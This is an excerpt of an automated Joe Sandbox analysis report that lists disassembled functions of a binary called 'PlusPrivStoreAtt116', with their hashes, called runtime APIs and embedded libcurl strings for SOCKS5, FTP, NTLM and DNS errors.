                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdupfree
                                        • String ID: %s: %s$FALSE$TRUE
                                        • API String ID: 1865132094-3430445539
                                        • Opcode ID: 48ef4f44275e059f43570315525e70aaac057089a6ab25aef8f9a0ec08dab94e
                                        • Instruction ID: 6ce4abf27dc7805536b4d9db984d0642470fcc1264cace8c7c5128a5c533288c
                                        • Opcode Fuzzy Hash: 48ef4f44275e059f43570315525e70aaac057089a6ab25aef8f9a0ec08dab94e
                                        • Instruction Fuzzy Hash: D5014061A0C78285FFE59B57A8543BA2B90BF45B88F684435DE4E87396DFACE185C300
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: SOCKS5: connecting to HTTP proxy %s port %d$SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu]$unknown$warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu
                                        • API String ID: 0-3012371547
                                        • Opcode ID: 2d5846d91ca8bc3f177153579fe7229ceec76d9fb31dec10718d32371e88f8f6
                                        • Instruction ID: 84884b4835bb192d290f99c00fb9ecf36b65483f7aa5c363bdf113feebfccefb
                                        • Opcode Fuzzy Hash: 2d5846d91ca8bc3f177153579fe7229ceec76d9fb31dec10718d32371e88f8f6
                                        • Instruction Fuzzy Hash: 5B61B073A0C38287E7058BA5E4403ADBFA1EF95B98F644135DA4D87786EE7CE441DB10
                                        APIs
                                          • Part of subcall function 00007FF6029A3D80: memcpy.VCRUNTIME140(?,?,?,00007FF6029B0BDD,?,?,?,?,?,?,?,0000006E00000006,00000000,?,0000000100000000,00007FF6029A1744), ref: 00007FF6029A3E32
                                          • Part of subcall function 00007FF6029A3D80: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6029A3E57
                                          • Part of subcall function 00007FF6029A3D80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6029B0BDD,?,?,?,?,?,?,?,0000006E00000006,00000000,?,0000000100000000,00007FF6029A1744), ref: 00007FF6029A3E14
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029B0DF0
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029B0DF7
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029B0DFE
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029B0E05
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029B0E0C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskmemcpy
                                        • String ID:
                                        • API String ID: 2318677668-0
                                        • Opcode ID: 9ee18b699d0ee2b22d0ea26408a5de4c3e2fe866b50876750de1e766a30f708b
                                        • Instruction ID: bd0ff1063c2621642742a17f070d84272bfccf07df874c2a435db2282d7c09b5
                                        • Opcode Fuzzy Hash: 9ee18b699d0ee2b22d0ea26408a5de4c3e2fe866b50876750de1e766a30f708b
                                        • Instruction Fuzzy Hash: ED61B362A04BC185EB21DB16E5983BE7B61EF41B88F604035DA4D47A9ADFBDD4D4C340
                                        APIs
                                          • Part of subcall function 00007FF6029F4BA0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F1635), ref: 00007FF6029F4BC6
                                          • Part of subcall function 00007FF6029F4BA0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F1635), ref: 00007FF6029F4BE7
                                          • Part of subcall function 00007FF6029F4BA0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F1635), ref: 00007FF6029F4C02
                                          • Part of subcall function 00007FF6029F4BA0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F1635), ref: 00007FF6029F4C10
                                          • Part of subcall function 00007FF6029F4BA0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F1635), ref: 00007FF6029F4C22
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029F4CC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$malloc
                                        • String ID: HTTP$NTLM
                                        • API String ID: 2190258309-4188377180
                                        • Opcode ID: 310f2fedebf3abff2b969a8b9fc04d504a9c657355cef8b5efcc27c4b5982e0a
                                        • Instruction ID: 3a8ec4bab7c8c6d860288e4a4ccd593ca430de31c3f466d1ea3b7e5e00c3251b
                                        • Opcode Fuzzy Hash: 310f2fedebf3abff2b969a8b9fc04d504a9c657355cef8b5efcc27c4b5982e0a
                                        • Instruction Fuzzy Hash: 8E613D32608B8282E7A08F16E45066B7BA4FF88B98F645135EF8D83B59DF7CD454CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: ABOR$Failure sending ABOR command: %s$Remembering we are in dir "%s"$control connection looks dead
                                        • API String ID: 1294909896-1891748601
                                        • Opcode ID: 3d884a203d83090ffe62485e98734a21a80b1e97f8e935cdd0b74f8328bf0181
                                        • Instruction ID: 997b9cabab491a0756b9d5800592423c774ec001c729cf815a238d8427a30938
                                        • Opcode Fuzzy Hash: 3d884a203d83090ffe62485e98734a21a80b1e97f8e935cdd0b74f8328bf0181
                                        • Instruction Fuzzy Hash: F451B372E0C68282EF65D72291503B96A54BF8176CF640635DEAD876C3EFFCE4858341
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpy
                                        • String ID: TRUE
                                        • API String ID: 3401966785-3412697401
                                        • Opcode ID: fdcb7d946d6f4c56cd4cb5e04898495fa3908ca8b450039cfbc1a8853e139c9d
                                        • Instruction ID: f3a7cb23c271059a3e1ef0bb51dcc7ce0be6b61e19bb5a20dcd6d77a41d6696a
                                        • Opcode Fuzzy Hash: fdcb7d946d6f4c56cd4cb5e04898495fa3908ca8b450039cfbc1a8853e139c9d
                                        • Instruction Fuzzy Hash: A3414962F5965245FBC58A1785643762FA2EF01BF8F244631EA6EC73C6DDACE085C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Start Date: %s$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$Start Date
                                        • API String ID: 1294909896-619256714
                                        • Opcode ID: cbf92bcd6793aa72cc27dffd8c02a67c1b3a20357b17b1339ed423fd338160e3
                                        • Instruction ID: 15a380cf1155f4e997edffe0b76473a99add09e0fda3a69dd461ab60a7fc1a09
                                        • Opcode Fuzzy Hash: cbf92bcd6793aa72cc27dffd8c02a67c1b3a20357b17b1339ed423fd338160e3
                                        • Instruction Fuzzy Hash: D7510361A4C6D284EBE08B5694041FABFA5FF02789F644436EA8DD6B96DFBCE541C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpy
                                        • String ID: %s: %s
                                        • API String ID: 3401966785-1451338302
                                        • Opcode ID: 8aa29f4585f255ba029eea63333c217ccd840dd140264be9fd03b8a32fc64a91
                                        • Instruction ID: d70d26e35de0de268d3e1eccabb94d28f6f52f3bab016b358b97ca75d413cebf
                                        • Opcode Fuzzy Hash: 8aa29f4585f255ba029eea63333c217ccd840dd140264be9fd03b8a32fc64a91
                                        • Instruction Fuzzy Hash: 83414A11A493D146FBE88A1790143BA5F91AF41BE4F24423ADE6F877C6DE5CD085C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$malloc
                                        • String ID: Signature: %s$Signature
                                        • API String ID: 2190258309-1663925961
                                        • Opcode ID: 550720ba448e89e296b3177c9229f94ff39cbd34f470cd30af1fe67ce97d91dd
                                        • Instruction ID: a89978d9c827334cd0a4954c79eb5d567c166b920b254b63a2cd9bd75a85dd2a
                                        • Opcode Fuzzy Hash: 550720ba448e89e296b3177c9229f94ff39cbd34f470cd30af1fe67ce97d91dd
                                        • Instruction Fuzzy Hash: EB217166B08AC286EB908B26E4442AA6760FF44BECF280532DE5D97796DF7CD141C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Failure sending QUIT command: %s$QUIT
                                        • API String ID: 1294909896-1162443993
                                        • Opcode ID: 33393fb904642c3d0dcdb626aeb8b9e9c3a7be83ef8c359fc7733d2ec1a96521
                                        • Instruction ID: 061cda556b882e66835c388e741e50ef243501bb92eb420bc99d7cf0b08f97cb
                                        • Opcode Fuzzy Hash: 33393fb904642c3d0dcdb626aeb8b9e9c3a7be83ef8c359fc7733d2ec1a96521
                                        • Instruction Fuzzy Hash: 32314B32E0878281EB90CF26D5903B92BA4FF85B88F685031DE8E87656DFACD051C311
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$calloc$memcpy
                                        • String ID:
                                        • API String ID: 3478730034-0
                                        • Opcode ID: 625087e8469335b8afc7a4f200c7716dbfac2a474bdbc393e31681353d0923a6
                                        • Instruction ID: 4aa9132aa466740b869cd5b8f8b6ca09f631fecd0376035f477a8a113a68180c
                                        • Opcode Fuzzy Hash: 625087e8469335b8afc7a4f200c7716dbfac2a474bdbc393e31681353d0923a6
                                        • Instruction Fuzzy Hash: DA21B071A08B8286E710DF22942022A7AA4FF49BE8F244234DE9E9B795DF7CD540C700
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strchr$_strdupmalloc
                                        • String ID:
                                        • API String ID: 4236146995-0
                                        • Opcode ID: a40886b6908e31578bfd8f82542a965f67959f0adae9ad5dfc49a1b18558c2a1
                                        • Instruction ID: f19da7184924086850f90c87e4bde6f032c3c9ba57de446fa51212945b3d1669
                                        • Opcode Fuzzy Hash: a40886b6908e31578bfd8f82542a965f67959f0adae9ad5dfc49a1b18558c2a1
                                        • Instruction Fuzzy Hash: 93218C72A16B8681EF81CB2290543A927E1FF89B98F1C0034CE5D8B759FF69E490C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID: Start Date: %s$Start Date
                                        • API String ID: 3056473165-2389359183
                                        • Opcode ID: 82de22af3ff35828c09ee91c655910ca68ad529a7f34232fa4e9f3a269013407
                                        • Instruction ID: fd00babf1fe0221f0ded2c4f615bbdfe88e62700a156aa650ca357da94b69311
                                        • Opcode Fuzzy Hash: 82de22af3ff35828c09ee91c655910ca68ad529a7f34232fa4e9f3a269013407
                                        • Instruction Fuzzy Hash: 0F21F165A0838245EFE58B1285142F66E92BF15BECF284536DD1E8B6E6EEBCA5448300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$malloc
                                        • String ID: Signature: %s$Signature
                                        • API String ID: 2190258309-1663925961
                                        • Opcode ID: 39f8e22e6010466b82858a205a4893210a525d4427fd0ac6815d1becb6796e30
                                        • Instruction ID: d2fba3e1b3600ca3df29932694e0fc79361a7e0d44b340ad29caac684ef8d44c
                                        • Opcode Fuzzy Hash: 39f8e22e6010466b82858a205a4893210a525d4427fd0ac6815d1becb6796e30
                                        • Instruction Fuzzy Hash: 6D215162A08B8286EBE0CB26E4542BB6B60FF85B8CF640432DE4D97756DE7CD141C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: malloc$free
                                        • String ID: Signature: %s$Signature
                                        • API String ID: 1480856625-1663925961
                                        • Opcode ID: fdad2967fd82f3e3d00c658805d2c6cd49370dd863365039cb22b4e2afd20a66
                                        • Instruction ID: a8be89d7dc00c87e4e08bcdcd3d5663a74e6f39437e6849475d51c361634e627
                                        • Opcode Fuzzy Hash: fdad2967fd82f3e3d00c658805d2c6cd49370dd863365039cb22b4e2afd20a66
                                        • Instruction Fuzzy Hash: 82213066B08B8286EBA0CB26E4542EB6764FF85B8CF640432DE4D9775ADF7CE145C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: malloc$free
                                        • String ID: Signature: %s$Signature
                                        • API String ID: 1480856625-1663925961
                                        • Opcode ID: 71971b022ae8657752d3f71a5c925b7cafabf4b199b24d0758c8f45fcc128391
                                        • Instruction ID: 4bf2549cb51d8b48b48e1d3e53e1584dbaa75936b110e1578621e9d18e946565
                                        • Opcode Fuzzy Hash: 71971b022ae8657752d3f71a5c925b7cafabf4b199b24d0758c8f45fcc128391
                                        • Instruction Fuzzy Hash: 34215062A08B8286EBA0CB26E4542EB6764FF85B8CF240432DE4D9771ADF7CD141C700
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: CriticalSectionfree$CloseEnterHandleLeaveclosesocket
                                        • String ID:
                                        • API String ID: 469868127-0
                                        • Opcode ID: cdaac871417b2815011e1e24f7daa236251f8bef380f81fe0f9f7e20ce8ad1ed
                                        • Instruction ID: e2552407bcf11cb5457f57317692840dd3cd5113f2640b82550db918b538cd73
                                        • Opcode Fuzzy Hash: cdaac871417b2815011e1e24f7daa236251f8bef380f81fe0f9f7e20ce8ad1ed
                                        • Instruction Fuzzy Hash: 8B11FB36A08B4186E7219F53E6942297B70FF89B98F244131DF8D83B55DFB9E4A5C700
                                        APIs
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6029B2E89), ref: 00007FF6029B37EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strncpy
                                        • String ID: Host not found$Host not found, try again$No data record of requested type$Unrecoverable error in call to nameserver
                                        • API String ID: 3301158039-3625861382
                                        • Opcode ID: c676b4948ad8de873c01a31b3ac823a8978589e2fd7550f958a9477d6e004ffe
                                        • Instruction ID: 2da14f8c778796701007a661618b993913d3d04703acd73074b0c2d29285b015
                                        • Opcode Fuzzy Hash: c676b4948ad8de873c01a31b3ac823a8978589e2fd7550f958a9477d6e004ffe
                                        • Instruction Fuzzy Hash: 7F11ECA1E1C64391EF5AC71AF6D42781E90DF0578CF7851B1D60E86A96DDECF5C08304
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
